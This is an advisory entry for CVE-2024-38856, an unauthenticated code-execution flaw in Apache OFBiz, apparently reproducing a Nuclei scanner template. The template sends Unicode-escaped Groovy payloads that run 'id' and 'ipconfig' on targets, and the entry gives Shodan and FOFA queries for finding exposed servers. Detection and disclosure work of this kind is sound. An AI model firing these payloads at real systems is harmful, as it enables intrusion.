Apache OFBiz Incorrect Authorization - Remote Code Execution

Vulnerability Information

Vulnerability name: Apache OFBiz Incorrect Authorization - Remote Code Execution

Vulnerability ID:

  • CVE: CVE-2024-38856

Vulnerability type: authorization bypass

Severity: critical

Description: Apache OFBiz is an open-source enterprise resource planning (ERP) system that is widely used in enterprise services and provides customer relationship management (CRM), e-commerce, supply chain management (SCM) and related functions. Because of its flexibility and extensibility, OFBiz is adopted by many organisations worldwide. The vulnerability lies in OFBiz's authorization mechanism and takes the form of an incorrect-authorization flaw: an attacker can, without any authorization, send a specific HTTP request that executes screen rendering code, provided the screen definition does not explicitly check the user's permissions but instead relies on the configuration of its endpoint. The technical root cause is that the system fails to verify the user's permissions correctly, which leads to unauthorized access and potential remote code execution. The severity comes from the fact that an attacker can execute arbitrary code remotely, which may result in complete control of the system, disclosure of sensitive data, or disruption of service. Because the attack requires no authentication and can be automated, the threat to affected systems is extreme.

Vendor: Apache

Product: Apache OFBiz

Affected versions: through 18.12.14

Search query: app="Apache_OFBiz"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/e8fcbcfc348ef17d072e29a7acf5f340a0cf4265/http%2Fcves%2F2024%2FCVE-2024-38856.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details

id: CVE-2024-38856

info:
  name: Apache OFBiz Incorrect Authorization - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  impact: |
    An attacker can exploit this incorrect authorization vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data.
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    cve-id: CVE-2024-38856
    cvss-score: 9.8
    cwe-id: CWE-863
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    epss-score: 0.93490
    epss-percentile: 0.99819
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Apache_OFBiz"
    shodan-query: 'title:"OFBiz"'
    product: ofbiz
    vendor: apache
  tags: cve,cve2024,apache,ofbiz,rce,kev

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0070\u0063\u006f\u006e\u0066\u0069\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
        condition: or

      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200



Author: lianccc
Published: August 1, 2025